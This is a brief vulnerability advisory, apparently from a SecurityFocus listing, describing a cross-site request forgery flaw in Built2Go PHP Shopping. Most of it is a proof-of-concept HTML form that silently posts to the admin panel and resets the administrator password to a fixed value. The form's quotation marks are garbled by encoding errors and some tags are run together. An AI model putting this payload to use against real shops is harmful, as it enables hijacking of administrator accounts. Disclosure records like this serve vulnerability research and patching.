source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?><inputtype=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/><inputtype=â?hiddenâ? name=â?passâ? value=â?12121212?/><inputtype=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/><inputtype=â?hiddenâ? name=â?addnewâ? value=â?1?/><inputtype=â?hiddenâ? name=â?actionâ? value=â?saveâ?/><inputtype=â?hiddenâ? name=â?newâ? value=â?Submitâ?/></form>
